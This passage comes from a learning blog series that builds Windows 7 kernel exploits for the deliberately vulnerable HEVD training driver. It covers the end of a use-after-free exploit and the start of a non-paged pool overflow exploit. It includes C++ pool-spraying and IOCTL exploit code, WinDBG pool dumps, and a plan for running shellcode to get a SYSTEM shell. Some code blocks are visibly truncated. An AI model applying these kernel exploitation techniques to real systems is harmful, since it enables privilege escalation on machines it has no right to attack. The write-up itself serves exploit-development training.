And lastly in the screenshot we can see that move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UserAfterFreeObject. You can see that even after we run the routine, the vairable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at prepended to the chunk that serves as the call back function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First thing is first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle so that way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program, would’ve taken me a long time to trouble shoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;


typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
    cout << "[>] UAF object allocated.\n";

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
    cout << "[>] UAF object freed.\n";

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
    cout << "[>] Fake UAF object created.\n";

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";


int main() {

    HANDLE hFile = grab_handle();





    return 0;

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1

kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects and spray those into the holes we poked so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.


That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00


Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.


This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32 bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64 so this will be a 32 bit exploit only.

Reversing Relevant Function

The bug for this driver routine is really similar to some of the stack based buffer overflow vulnerabilities we’ve already done like the stack overflow and the integer overflow. We get a user buffer and send it to the routine which will allocate a kernel buffer and copy our user buffer into the kernel buffer. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool which are pool chunks that are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to paged pool which is allowed to be “paged out” when there is no more RAM capacity to a secondary storage medium.

The APIs that are relevant here in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. This API prototype looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and there is no vulnerability obviously; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing wise, we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";


int main() {

    HANDLE hFile = grab_handle();


    return 0;

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64 which is right after the memcpy operation and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax so we can go to that location with the !pool command which will start at the beginning of that page of memory and display certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428 which is 0x8 before. This is because there is a 4 byte ULONG value and our pool tag placed before our actually buffer begins. Using some of the commands from the aforementioned blogposts goes a long way in WinDBG to being able to clearly think about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes which we knew. The numbers that begin 0y are binary. But, you can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together and form this Ulong1 member which begins at offset 0x000. Then, from that offset, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to, was that the !pool command told us our chunk was 0x200 bytes long which makes sense when you add the size of the header 0x8 to our allocated buffer size of 0x1F8.

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worth while for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next, is take our pretty pool allocations that form a large solid block, and poke holes in it the size of our kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200 byte hole we have just created. Now what we have, is our alloaction completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not an arbitrary system process.

We will use this ability to overwrite data to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, end up to the kernel executing a function pointer which we will have filled with shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
>>> 0x200 / 0x40

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName

What’s most important for us now, is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar amount of objects that FuzzySec and r0otki7 did,

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";

    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";

    cout << "[>] Sequential spray complete.\n";

void send_payload(HANDLE hFile) {
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";


int main() {

    HANDLE hFile = grab_handle();



    return 0;

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects and then allocate our kernel buffer and see what the page looks like that our kernel buffer ends up being allocated on. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax don’t forget, so I just want to subtract 0x1000 from it because thats a small page size and then advance by just plugging that right in to the !pool command we get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do, is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane of and then, following along with the cited blogposts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  [email protected].....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty familiar to what we’ve done, obviously the PoolTag is different, but so is the Ulong1 value and you can examine the binary constituent parts that lead to its formulation. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO which starts at offset 0x8 from the beginning of our allocation and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null) 

So far, none of these things can be changed by our overwrite. Our overwrite has to keep all of this data intact so we’ll have to write these values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting as the TypeIndex value right now is set to 0xc. 0xc is actually an array index value, like array[0xc]. This array, is called the ObTypeIndexTable and it is filled with pointers which define OBJECT_TYPEs. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry, 82997760, is array index 0, then 0xc index is going to be 85053520. Let’s get WinDBG to spill the beans on this type and let’s see if its indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
